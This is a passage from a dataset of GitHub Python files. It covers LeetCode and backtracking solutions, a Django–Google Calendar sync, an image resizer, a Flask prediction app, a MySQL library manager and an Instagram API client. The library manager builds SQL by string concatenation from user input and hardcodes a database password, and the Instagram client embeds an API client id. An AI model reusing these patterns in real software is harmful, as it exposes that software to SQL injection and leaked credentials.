root\n\n return helper(0, self._getLength(head) - 1)\n\n def _getLength(self, head: Optional[ListNode]) -> int:\n length = 0\n curr = head\n while curr:\n length += 1\n curr = curr.next\n return length\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0109. Convert Sorted List to Binary Search Tree/0109-3.py","file_name":"0109-3.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"14566361150","text":"import datetime\nimport json\nimport os\n\nfrom django.db.models.signals import post_delete, post_save\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom .models import Event\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = [\"https://www.googleapis.com/auth/calendar\"]\n\n\ndef get_service(refresh=False):\n credentials = ServiceAccountCredentials.from_json_keyfile_dict(\n json.loads(os.environ.get(\"client_secret\")), scopes=SCOPES\n )\n # or if you have a file\n # credentials = ServiceAccountCredentials.from_json_keyfile_name(\n # filename=\"file.json\", scopes=SCOPES\n # )\n service = build(\"calendar\", \"v3\", credentials=credentials)\n return service\n\n\ndef handle_event(sender, created, instance, **kwargs):\n \"\"\"this function creates the events in the google agenda and updates them if changed in the website\"\"\"\n service = get_service()\n event = instance\n if not event.end_date:\n event.end_date = event.start_date\n if not event.end_time and event.start_time:\n event.end_time = event.start_time\n elif not event.end_time:\n event.end_time = datetime.datetime.min.time()\n if not event.start_time:\n event.start_time = datetime.datetime.min.time()\n if event.end_date < event.start_date:\n event.end_date, event.start_date = event.start_date, event.end_date\n queryset = Event.objects.filter(\n id=event.id\n ) # https://stackoverflow.com/questions/1555060/how-to-save-a-model-without-sending-a-signal\n # this is used so that we can update the google event within this signal without reshooting this signal(signals shot every time an object is saved)\n event = {\n \"summary\": event.description,\n \"location\": event.location or \"\",\n \"description\": (event.description + \" \" + event.summary),\n \"start\": {\n \"dateTime\": datetime.datetime.combine(\n event.start_date, event.start_time\n ).isoformat(),\n \"timeZone\": \"Europe/Amsterdam\",\n },\n \"end\": {\n \"dateTime\": datetime.datetime.combine(\n event.end_date, event.end_time\n ).isoformat(),\n \"timeZone\": \"Europe/Amsterdam\",\n },\n \"recurrence\": [],\n \"reminders\": {},\n }\n\n if created or not instance.google_link:\n try:\n event = (\n service.events()\n .insert(\n calendarId=os.environ.get(\"calendarId\"),\n body=event,\n )\n .execute()\n )\n queryset.update(google_link=event[\"id\"])\n except HttpError as error:\n # print(\"An error occurred: %s\" % error)\n pass\n else:\n try:\n event = (\n service.events()\n .update(\n calendarId=os.environ.get(\"calendarId\"),\n body=event,\n eventId=instance.google_link,\n )\n .execute()\n )\n queryset.update(google_link=event[\"id\"])\n except HttpError as error:\n # print(\"An error occurred: %s\" % error)\n pass\n # print(\"#############ADDED NEW #############\")\n\n\ndef delete_event(sender, instance, **kwargs):\n \"\"\"this function deletes an event from google agenda when deleted in the website\"\"\"\n try:\n service = get_service()\n service.events().delete(\n calendarId=os.environ.get(\"CalendarId\"),\n eventId=instance.google_link,\n ).execute()\n except:\n pass\n\n\npost_save.connect(handle_event, sender=Event)\npost_delete.connect(delete_event, sender=Event)\n","repo_name":"zelhus-iliyas/test-api","sub_path":"new/clientusers/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34216660513","text":"import nltk\nimport pandas as pd\nfrom pandas import DataFrame\nimport re\nimport numpy as np\n\n\n# Data Processing\ndef to_lowercase(words):\n\n \"\"\"Convert all characters to lowercase from list of tokenized words\n Args: A list of words to be processed\n Returns: A list of processed words\"\"\"\n\n new_words = []\n for word in words:\n new_word = word.lower()\n new_words.append(new_word)\n return new_words\n\ndef remove_punctuation(words):\n\n \"\"\"Remove punctuation from list of tokenized words\n Args: A list of words to be processed\n Returns: A list of processed words\"\"\"\n\n new_words = []\n for word in words:\n new_word = re.sub(r'[^\\w\\s]','', word)\n if new_word != '':\n new_words.append(new_word)\n return new_words\n\ndef data(df):\n\n \"\"\"\n \"\"\"\n essay_set_list = (df['EssaySet'].unique())\n max_score_list = []\n for i in essay_set_list:\n max_score_list.append(df[df['EssaySet']==i]['Score1'].max())\n # print('Max score for essay {} is {}'.format(i, max_score_list[i-1]))\n\n\n reference = pd.DataFrame()\n candidates = pd.DataFrame()\n\n for i in essay_set_list:\n ref = df[(df['EssaySet']==i) & (df['Score1']==max_score_list[i-1])]\n ref_list = [reference, ref]\n reference = pd.concat(ref_list)\n cands = df[(df['EssaySet']==i) & (df['Score1']!=max_score_list[i-1])]\n cand_list = [candidates, cands]\n candidates = pd.concat(cand_list)\n\n\n total_ref = reference.count()[0]\n total_cand = candidates.count()[0]\n # print(total_ref, total_cand, total_ref+total_cand)\n\n essay_set_list_ref = (reference['EssaySet'].unique())\n essay_set_list_cand = (candidates['EssaySet'].unique())\n # print(essay_set_list_ref, essay_set_list_cand)\n\n\n ref = df.loc[(df['Score1']==1) & (df['EssaySet']!=3)]\n # ref.head(5)\n # ref.loc[0]['EssaySet']\n\n\n # Genearting the corpus\n\n reference_corpus = []\n candidate_corpus = []\n reference_id = []\n candidate_id = []\n candidate_scores = []\n\n for i in essay_set_list:\n ref = reference.loc[reference['EssaySet']==i]\n cand = candidates.loc[candidates['EssaySet']==i]\n \n count_ref = ref.count()[0]\n count_cand = cand.count()[0]\n \n ref_list = []\n cand_list = []\n cand_id = []\n ref_id = []\n score = []\n \n for j in range(count_ref):\n ref_list.append(list(ref.iloc[j]['EssayText'].split()))\n ref_id.append(ref.iloc[j]['Id'])\n ref_tuple = (i, ref_list)\n ref_id_tuple = (i, ref_id)\n reference_corpus.append(ref_tuple)\n reference_id.append(ref_id_tuple)\n \n for j in range(count_cand):\n cand_list.append(list(cand.iloc[j]['EssayText'].split()))\n cand_id.append(cand.iloc[j]['Id'])\n score.append(cand.iloc[j]['Score1'])\n cand_tuple = (i, cand_list)\n cand_id_tuple = (i, cand_id)\n score_tuple = (i, score)\n\n candidate_corpus.append(cand_tuple)\n candidate_id.append(cand_id_tuple)\n candidate_scores.append(score_tuple)\n\n reference_corpus = dict(reference_corpus)\n candidate_corpus = dict(candidate_corpus)\n reference_id = dict(reference_id)\n candidate_id = dict(candidate_id)\n candidate_scores = dict(candidate_scores)\n\n\n reference_corpus = list(reference_corpus.values())\n candidate_corpus = list(candidate_corpus.values())\n reference_id = list(reference_id.values())\n candidate_id = list(candidate_id.values())\n candidate_scores = list(candidate_scores.values())\n\n\n\n new_reference_corpus = []\n new_candidate_corpus = []\n\n for i in essay_set_list:\n ref_list = []\n cand_list = []\n for j in range(len(reference_corpus[i-1])):\n ref_list.append(to_lowercase(remove_punctuation(reference_corpus[i-1][j])))\n for j in range(len(candidate_corpus[i-1])):\n cand_list.append(to_lowercase(remove_punctuation(candidate_corpus[i-1][j])))\n ref_tuple = (i, ref_list)\n cand_tuple = (i, cand_list)\n new_reference_corpus.append(ref_tuple)\n new_candidate_corpus.append(cand_tuple)\n\n new_reference_corpus = dict(new_reference_corpus)\n new_candidate_corpus = dict(new_candidate_corpus)\n\n\n reference_corpus = list(new_reference_corpus.values())\n candidate_corpus = list(new_candidate_corpus.values())\n\n return reference_corpus, candidate_corpus, reference_id, candidate_id, candidate_scores, max_score_list\n\ndef wmt_data_refs(words):\n words = words.split()\n newlist = []\n newlist.append((remove_punctuation(to_lowercase(words))))\n return newlist\n\ndef wmt_data_cands(words):\n words = words.split()\n return remove_punctuation(to_lowercase(words))\n\n","repo_name":"EshwarSR/AutomaticEvaluationMetrics","sub_path":"2_BLEU/SAS_processing.py","file_name":"SAS_processing.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2541757097","text":"'''\n 제일 어려운 문제가 아닐까 싶다.\n backtracking에 대해서 공부하게 된 계기(n-queen 기초부터 )\n + word와 cards의 길이가 다른 경우에도 대응하는 코드를 생각하는데 한참 걸린... \n'''\nfrom collections import defaultdict\ndef solution(word, cards):\n\n answer = 0\n word_length = len(word)\n cards_length = len(cards)\n if word_length > cards_length:\n return 0\n\n word_counter = defaultdict(int) # 1. 단어 개수 체크 변수 - 지금(2022-03-28) 생각해보니 이게 핵심1\n for w in word :\n word_counter[w]+=1 \n column_visitor = defaultdict(bool) # 2. 방문 여부 체크 변수\n\n def find(word_index=0, row=0):\n\n nonlocal answer # 3. nonlocal 키워드 유용 - 바깥 answer 사용하기\n if word_index == word_length:\n answer+=1\n return \n\n if row == cards_length:\n return \n\n for i, c in enumerate(cards[row]):\n\n if column_visitor[i] or word_counter[c]==0: \n continue\n \n # 선택하는 경우\n column_visitor[i]=True\n word_counter[c]-=1\n find(word_index+1, row+1)\n column_visitor[i]=False\n word_counter[c]+=1\n\n # (2022-03-29) 아니 어렵다....\n # 핵심2 - 예제3 같은 경우를 대비해야 한다. / word의 길이와 cards의 길이가 다른 경우 -> 어려웠다.\n # word cards의 길이가 같은 경우는 아래 코드 필요 없고, 22,23번줄도 필요 없음\n find(word_index, row+1) # word 소비는 하지않고, row만 한개 늘림 - 22번,23번줄 필요 \n find()\n return answer\n\n# 문제 cards에서 word를 가능하게 찾기 / 행단 문자 한개, 같은 열 안됨. \nprint(solution(word = \"APP\" , cards = [\"AVV\", \"XPP\", \"XPP\"])) # 1 - 예제1\nprint(solution(word = \"APPLE\" , cards = [\"LLZKE\", \"LCXEA\", \"CVPPS\", \"EAVSR\", \"FXPFP\"])) # 3 - 예제2\nprint(solution(word = \"BAB\" , cards = [\"ZZBZ\", \"BAZB\", \"XBXB\", \"XBAX\"])) # 4 - 예제3 / 아 이것도 만만치 않네.\n\n\n","repo_name":"DeepFocuser/Algorithm_Study","sub_path":"programmers/backtracking_카드게임_hard.py","file_name":"backtracking_카드게임_hard.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9853715095","text":"\"\"\"\nClaim typings\n\"\"\"\n\nfrom typing import Dict, Union, TypedDict\n\n\nclass ClaimField(TypedDict):\n name: str\n value: str\n\n\nClaimFields = list[ClaimField]\n\n\nclass ClaimFieldsInput(TypedDict):\n fields: ClaimFields\n\n\nclass ClaimRequest(TypedDict):\n address: str\n signature: str\n nonce: str\n reward_id: str\n reward_claim_values: ClaimFieldsInput\n\n\nclass ClaimVerificationResponse(TypedDict):\n # tier: Dict[str, Union[str, Dict[str, str]]]\n claimable: bool\n","repo_name":"SongADAO/songaday-rewards-api","sub_path":"app/claim/typings.py","file_name":"typings.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2672310958","text":"import threading\nimport time\ndef green_light(pattern,rlock):\n rlock.acquire()\n if pattern==0:\n print('Green light-Go!')\n time.sleep(1)\n rlock.release()\ndef yellow_light(pattern,rlock):\n rlock.acquire()\n if pattern==1:\n print('Yellow light-Prepare to stop!')\n time.sleep(1)\n rlock.release()\ndef red_light(pattern,rlock):\n rlock.acquire()\n if pattern==2:\n print('Red light-Stop!')\n time.sleep(1)\n rlock.release()\npatterns=[0,1,2]\nrlock=threading.RLock()\nfor pattern in patterns:\n t1=threading.Thread(target=green_light,args=(pattern,rlock))\n t2=threading.Thread(target=yellow_light,args=(pattern,rlock))\n t3=threading.Thread(target=red_light,args=(pattern,rlock))\n t1.start()\n t2.start()\n t3.start()\n t1.join()\n t2.join()\n t3.join()","repo_name":"Riazul7/Assignment-Project","sub_path":"Assignment-7/C718.py","file_name":"C718.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12477455021","text":"import math, random\n\ntab32 = [\n 0, 9, 1, 10, 13, 21, 2, 29,\n 11, 14, 16, 18, 22, 25, 3, 30,\n 8, 12, 20, 28, 15, 17, 24, 7,\n 19, 27, 23, 6, 26, 5, 4, 31]\n\ndef simulation_log2(value:int) -> int:\n value |= value >> 1\n value |= value >> 2\n value |= value >> 4\n value |= value >> 8\n value |= value >> 16\n idx = (int(value * 0x07C4ACDD) & 0xFFFF_FFFF) >> 27\n return tab32[idx]\n\ndef _zerofind(value:int) -> int:\n ret = 0\n rev = list(range(32))[::-1]\n for i in rev:\n if (value >> i) & 0x0000_0001 == 0x0000_0000:\n ret += 1\n else:\n break\n return ret\n\ndef simulation_div(x:int, D:int, N:int) -> int:\n # k = x + math.ceil(simulation_log2(D))\n k = x + (x - _zerofind(D-1)) # ceil(log2(D)) = N - LDZ(D-1)\n # a = math.ceil((2**k)/D) - (2**x)\n a = (((1 << k) + ((D>>1)+1)) // D) - (1 << x)\n\n # b = math.floor((N * a) / (2**x))\n b = (N * a) >> x\n # print(k, N, a, b)\n\n # result = math.floor((math.floor((N-b)/2) + b) / (2**(k-x-1)))\n result = (((N-b)>>1) + b) >> (k-x-1)\n\n return result\n\ndef random_test(tc:int) -> None:\n tc_num = tc\n fails = 0\n while tc_num:\n \n to_div = random.randint(0,255)\n divisor = random.randint(0,100000)\n divisor_round = divisor >> 1\n validate = ((to_div*255)+divisor_round) // divisor\n if (validate > 255):\n continue\n\n ref = ((to_div*255)+divisor_round) // divisor\n out = simulation_div(32, divisor, to_div)\n\n if ref != out:\n fails += 1\n\n tc_num -= 1\n print(f\"{fails} / {tc} Failed\")\n\n\nif __name__ == \"__main__\":\n \n # for unsigned 32 bits\n x = 32\n D = 90781\n N = 178 * 255 + (D>>1)\n # D = 883\n # N = 30022\n result = simulation_div(x, D, N)\n print(result)\n\n random_test(100)\n\n\n\n","repo_name":"ljwoo94/CalculationOpt","sub_path":"div_simulation.py","file_name":"div_simulation.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33596962441","text":"class Solution(object):\n def countGoodSubstrings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n count = 0\n \n for i in range(2, len(s)):\n currentSubstring = s[i-2:i+1] # get three char\n uniqueSet = set(currentSubstring)\n if len(uniqueSet) == 3:\n count += 1\n \n return count\n ","repo_name":"tinatran079/leetcode","sub_path":"1876-substrings-of-size-three-with-distinct-characters/1876-substrings-of-size-three-with-distinct-characters.py","file_name":"1876-substrings-of-size-three-with-distinct-characters.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33990221611","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image, ImageTk\r\nimport PIL.Image\r\n\r\nfrom tkinter import *\r\nimport tkinter.filedialog\r\nimport tkinter.messagebox\r\nimport os\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\troot = Tk()\r\n\troot.title(\"Klim[ON]_image_resizer_1.0\")\r\n\troot.geometry(\"680x500\")\r\n\troot.resizable(False, False)\r\n\t\r\nlinks = []\r\nlink_replace = \"\"\r\nfinal_width = 694\r\nfinal_heigh = 521\r\n\r\ncrop_left = 0\r\ncrop_right = 0\r\ncrop_top = 0\r\ncrop_bottom = 0\r\n\r\n\r\n#=============open files===============================================\t\r\n\t\r\n\r\n\r\ndef open(): \r\n\t\r\n\tbutton_2['state'] = 'normal'\r\n\tbutton_3['state'] = 'normal'\r\n\r\n\tfilez = tkinter.filedialog.askopenfilenames(parent=root, initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpeg, bmp and png files\",\"*.jpg *.bmp *.png\"),(\"all files\",\"*.*\")))\r\n\t\r\n\tglobal links\r\n\tlinks = list(filez)\r\n\treturn links\r\n\r\n\r\n#==============================convert==================================\t\r\n\r\n\r\n\r\ndef convert():\r\n\t\r\n\tbutton_2['state'] = 'disabled'\r\n\t\r\n\tnum_of_files = 0\r\n\ta = int(enyry_1.get())\r\n\tb = int(enyry_2.get())\r\n\t\r\n\tsave_filez = tkinter.filedialog.askdirectory() # предлагаю дирректорию куда сохранить\r\n\t\r\n \r\n\tfor link in links:\r\n\t\tnum_of_files = num_of_files+1\r\n\t\tos.path.split(link)\r\n\t\tfile_name = os.path.split(link)[1]\r\n\t\tlink_replace = link.replace('/',r'\\\\')\r\n\t\tfoo = PIL.Image.open(str(link_replace))\r\n\t\tprint(foo)\r\n\t\t# I downsize the image with an ANTIALIAS filter (gives the highest quality)\r\n\t\t\r\n\r\n\t\tfoo = foo.resize((a,b),PIL.Image.ANTIALIAS)\r\n\r\n\t\tnew_save_filez = save_filez.replace('/',r'\\\\')\r\n\t\t\r\n\t\tif '.jpg' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.jpg','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(resized)'+str(file_name),optimize=True,quality=95) # jpeg into jpeg\r\n\r\n\t\telif '.bmp' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.bmp','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(resized)'+str(file_name),optimize=True,quality=95)\r\n\t\telif '.png' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.png','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(resized)'+str(file_name),optimize=True,quality=95)\r\n\ttkinter.messagebox.showinfo(\"Succes\", str(num_of_files) + \" files were resized\") # вывожу сообщение что всё гуд\r\n\r\n\r\n\r\n\r\n#==============================crop==================================\r\n\r\n\r\n\r\ndef crop():\r\n\r\n\tleft = int(enyry_3.get())\r\n\tright = int(enyry_4.get())\r\n\ttop = int(enyry_5.get())\r\n\tbottom = int(enyry_6.get())\r\n\t\r\n\tbutton_2['state'] = 'disabled'\r\n\t\r\n\tnum_of_files = 0\r\n\t\r\n\tsave_filez = tkinter.filedialog.askdirectory() # предлагаю дирректорию куда сохранить\r\n\t \r\n\tfor link in links:\r\n\t\tnum_of_files = num_of_files+1\r\n\t\tos.path.split(link)\r\n\t\tfile_name = os.path.split(link)[1]\r\n\t\tlink_replace = link.replace('/',r'\\\\')\r\n\t\t\r\n\t\tfoo = PIL.Image.open(str(link_replace))\r\n\t\t\t\t\r\n\t\twidth, height = foo.size\r\n\t\t\r\n\t\tarea = ((width+left)-width, (height+top)-height, width-right, height-bottom) # x, y лувого верхнего углв, x,y правого нижнего угла\r\n\t\t\r\n\t\tfoo = foo.crop(area)\r\n\t\t\r\n\t\tnew_save_filez = save_filez.replace('/',r'\\\\')\r\n\t\t\r\n\r\n\t\tif '.jpg' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.jpg','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(croped)'+str(file_name),optimize=True,quality=95) # jpeg into jpeg\r\n\r\n\t\telif '.bmp' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.bmp','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(croped)'+str(file_name),optimize=True,quality=95)\r\n\t\telif '.png' in link_replace:\r\n\t\t\t#new_path = link_replace.replace('.png','(1).jpg')\r\n\t\t\tfoo.save(str(new_save_filez)+'\\\\' + '(croped)'+str(file_name),optimize=True,quality=95)\r\n\ttkinter.messagebox.showinfo(\"Succes\", str(num_of_files) + \" files were croped\") # вывожу сообщение что всё гуд\r\n\r\n\r\n\r\n\t#=================расположение=========================================\r\n\r\n\r\n\r\nbutton_1 = Button(root, width=20,height=3, text=\"Open photo\", command = open)\r\nbutton_1.grid(columnspan=7,column=3, rowspan=1, pady=30, padx=5)\r\nbutton_1.bind()\r\n\r\n\r\nlabel_1 = Label(root, text='final_width (px.)') # надпись\r\nlabel_2 = Label(root, text='final_heigh (px.)') # надпись\r\n\r\nlabel_3 = Label(root, text='crop_left (px.)') # надпись\r\nlabel_4 = Label(root, text='crop_right (px.)') # надпись\r\nlabel_5 = Label(root, text='crop_top (px.)') # надпись\r\nlabel_6 = Label(root, text='crop_bottom (px.)') # надпись\r\n\r\n#enyry_1 = Entry(root) #поле ввода ширины\r\n#enyry_1.insert(END, final_width) #значени по умолчанию\r\n#enyry_2 = Entry(root) #поле ввода высоты\r\n\r\n\r\n\r\n\r\nenyry_1 = Entry(root) #поле ввода ширины\r\nenyry_1.insert(END, final_width) #значени по умолчанию\r\nenyry_2 = Entry(root) #поле ввода высоты\r\nenyry_2.insert(END, final_heigh) #значени по умолчанию\r\n\r\n\r\n\r\nenyry_3 = Entry(root) #поле ввода ширины\r\nenyry_3.insert(END, crop_left) #значени по умолчанию\r\nenyry_4 = Entry(root) #поле ввода высоты\r\nenyry_4.insert(END, crop_right) #значени по умолчанию\r\nenyry_5 = Entry(root) #поле ввода ширины\r\nenyry_5.insert(END, crop_top) #значени по умолчанию\r\nenyry_6 = Entry(root) #поле ввода высоты\r\nenyry_6.insert(END, crop_bottom) #значени по умолчанию\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nlabel_1.grid(row=1, padx=20,pady=30 ,sticky=E)\r\nlabel_2.grid(row=2,padx=20, sticky=E)\r\nlabel_3.grid(row=1,column=2,padx=10, sticky=E)\r\nlabel_4.grid(row=2,column=2,padx=10, sticky=E)\r\nlabel_5.grid(row=3,column=2,padx=10, sticky=E)\r\nlabel_6.grid(row=4,column=2,padx=10, sticky=E)\r\nenyry_1.grid(row=1, column=1, padx=10)\r\nenyry_2.grid(row=2, column=1, padx=10)\r\nenyry_3.grid(row=1, column=3,pady=20, padx=10)\r\nenyry_4.grid(row=2, column=3,pady=20, padx=10)\r\nenyry_5.grid(row=3, column=3,pady=20, padx=10)\r\nenyry_6.grid(row=4, column=3,pady=20, padx=10)\r\n\r\n\r\n#=====================================================================\r\n\r\n\r\n\r\n\r\n\r\nbutton_2 = Button(root, width=20,height=3, state=DISABLED, text=\"RESIZE\", command = convert)\r\nbutton_2.grid( columnspan=2, rowspan=1, pady=30, padx=100)\r\nbutton_2.bind()\r\n\r\n\r\nbutton_3 = Button(root, width=20,height=3, state=DISABLED, text=\"CROP\", command = crop)\r\nbutton_3.grid( columnspan=2,row=5,column=2 , rowspan=1, pady=40, padx=20)\r\nbutton_3.bind()\r\n\r\n\r\n\r\nroot.mainloop()","repo_name":"klimon69/Photo_resizer_and_cropper","sub_path":"Photo_resizer_and_cropper_v_1_0_1.py","file_name":"Photo_resizer_and_cropper_v_1_0_1.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34778128166","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 8 23:15:33 2021\n\n@author: Anshuman Raj\n\"\"\"\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport xgboost as xgb\nfrom flask import Flask, render_template, request\nconv_dict={0:\"Normal Bidder\",1: \"Suspicious Bidder\"}\n#making the flask app\napp = Flask('fraud_dtection')\n\n\n@app.route('/')\ndef show_predict_bidder_form():\n return render_template('/predictorform.html')\n\n@app.route('/results', methods=['POST'])\ndef results():\n form = request.form\n if request.method == 'POST':\n# Loading model to compare the results\n model = pickle.load(open('model.pkl','rb'))\n Bidder_ID= request.form['Bidder_ID']\n \n#Getting the data\n sb_data=pd.read_csv(\"./data/Shill_Bidding_Dataset.csv\",header=0)\n df=sb_data.to_numpy()\n x=df[int(Bidder_ID):int(Bidder_ID)+2,3:12]\n dtest=xgb.DMatrix(x)\n num_status=model.predict(dtest)\n status=conv_dict[num_status[0]]\n#returning all the required values to result\n return render_template('resultsform.html', Bidder_ID=Bidder_ID, predicted_status=status, Bidder_Tendency=x[0][0], Bidding_Ratio=x[0][1],\n Successive_Outbidding=x[0][2],\n Last_Bidding=x[0][3],\n Winning_Ratio=x[0][7])\n\napp.run(\"localhost\", \"9999\", debug=True)","repo_name":"Anshuman-Raj/Minor_Project","sub_path":"model_loading.py","file_name":"model_loading.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2632571497","text":"print(\"*****LIBRARY MANAGEMENT SYSTEM*****\")\r\n#creating database\r\nimport mysql.connector\r\ndbs=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"Vikh1234\",auth_plugin='mysql_native_password')\r\ncur=dbs.cursor()\r\ncur.execute(\"create database if not exists lib\")\r\ncur.execute(\"use lib\")\r\n#creating required tables\r\ncur.execute(\"create table if not exists books(bname varchar(30),bcode varchar(20),total int,subject varchar(20))\")\r\ncur.execute(\"create table if not exists issue(stname varchar(30),stid varchar(20),bcode varchar(20),issue varchar(30))\")\r\ncur.execute(\"create table if not exists submit(stname varchar(30),stid varchar(20),bcode varchar(20),submit varchar(30))\")\r\ndbs.commit()\r\nwhile True:\r\n print(\"\"\"\r\n1- Add book\r\n2- Issue book\r\n3- Return book\r\n4- Delete book\r\n5- Display all books\r\n\"\"\")\r\n ch=int(input(\"Enter choice:\"))\r\n if ch==1:\r\n bn=input(\"Enter book name:\")\r\n bc=input(\"Enter book code:\")\r\n total=int(input(\"Enter total books:\"))\r\n sub=input(\"Enter subject:\")\r\n cur.execute(\"insert into books values('\"+bn+\"','\"+bc+\"',\"+str(total)+\",'\"+sub+\"')\")\r\n dbs.commit()\r\n print(\"Book added successfully\")\r\n if ch==2:\r\n n=input(\"Enter name of student:\")\r\n ide=input(\"Enter student id:\")\r\n bcd=input(\"Enter book code:\")\r\n d=input(\"Enter issue date:\")\r\n cur.execute(\"insert into issue values('\"+n+\"','\"+ide+\"','\"+bcd+\"','\"+d+\"')\")\r\n cur.execute('update books set total=total-1 where bcode=\"'+str(bcd)+'\"')\r\n dbs.commit()\r\n print(\"Book issued to:\",n)\r\n if ch==3:\r\n n=input(\"Enter name of student:\")\r\n ide=input(\"Enter student id:\")\r\n bcd=input(\"Enter book code:\")\r\n d=input(\"Enter return date:\")\r\n cur.execute(\"insert into issue values('\"+n+\"','\"+ide+\"','\"+bcd+\"','\"+d+\"')\")\r\n cur.execute('update books set total=total+1 where bcode=\"'+str(bcd)+'\"')\r\n dbs.commit()\r\n print(\"Book submitted from:\",n)\r\n if ch==4:\r\n cod=input('enter book code to be deleted from record:')\r\n cur.execute('delete from books where bcode=\"'+str(cod)+'\"')\r\n dbs.commit()\r\n print('RECORD SUCCESSFULLY DELETED')\r\n if ch==5:\r\n cur.execute(\"select * from books\")\r\n for i in cur:\r\n print(i)\r\n dbs.commit()\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n","repo_name":"vikhyatii/Library-Management-System","sub_path":"LMS1.py","file_name":"LMS1.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1659534026","text":"import sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\n\ndef chk(startY, startX, endY, endX):\n tmp = S[startY][startX]\n for y in range(startY, endY+1):\n for x in range(startX, endX+1):\n if S[y][x] != tmp:\n return -1\n return tmp\n\n\ndef dc(startY, startX, endY, endX):\n if startY == endY and startX == endX:\n print(S[startY][startX], end='')\n return\n c = chk(startY, startX, endY, endX)\n if c == '0':\n print(c, end='')\n return\n elif c == '1':\n print(c, end='')\n return\n else:\n tp = (\n (startY, startX, (startY+endY)//2, (startX+endX)//2),\n (startY, (startX+endX)//2+1, (startY+endY)//2, endX),\n ((startY+endY)//2+1, startX, endY, (startX+endX)//2),\n ((startY+endY)//2+1, (startX+endX)//2+1, endY, endX)\n )\n print('(', end='')\n for v in tp:\n dc(v[0], v[1], v[2], v[3])\n print(')', end='')\n\n\nN = int(input())\nS = [input().rstrip() for _ in range(N)]\n\ndc(0, 0, N-1, N-1)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"윤효전/210826/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36404117404","text":"import requests\nimport json\n\nclass MediaGrabber:\n\n\tplaces = {\"tokyo\": (35.6895, 139.6917), \"san francisco\": (37.7833, 122.4167), \"facebook\": (37.484666, 122.150129)}\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef get_pics(self, lat, lng, count=20):\n\t\t\"\"\"\n\t\tReturns a list of media (picture urls) from a given area.\n\t\t\"\"\"\n\t\turl = \"https://api.instagram.com/v1/media/search\"\n\t\tparams = {\"client_id\": \"9a5510f048e34950bda6c0f2c87f695b\", \"lat\": lat, \"lng\": lng, \"count\": count}\n\t\tdata = requests.get(url, params=params).json()\n\n\t\tout_data = []\n\t\tfor elem in data[\"data\"]:\n\t\t\tcaption = ''\n\t\t\tif elem[\"caption\"]:\n\t\t\t\tcaption = unicode(elem[\"caption\"][\"text\"])\n\t\t\tout = {\n\t\t\t \"image_link\": elem[\"images\"][\"standard_resolution\"][\"url\"].encode('ascii', 'ignore'),\n\t\t\t \"caption\": 'CAPTION: ' + caption,\n\t\t\t \"username\": 'USER: ' + elem[\"user\"][\"username\"]\n\t\t\t } # CHECK THIS FOR EMOTICON SHIT\n\t\t\tout_data.append(out)\n\t\treturn out_data\n","repo_name":"jjwon0/Viewfinder","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24714762673","text":"import random as rd\nimport pyttsx3 as pt3\nengine1 = pt3.init()\nengine1.setProperty('rate', 150)\nengine1.setProperty('volume', 0.9)\nwhile True:\n q = input()\n ans = ['yes', 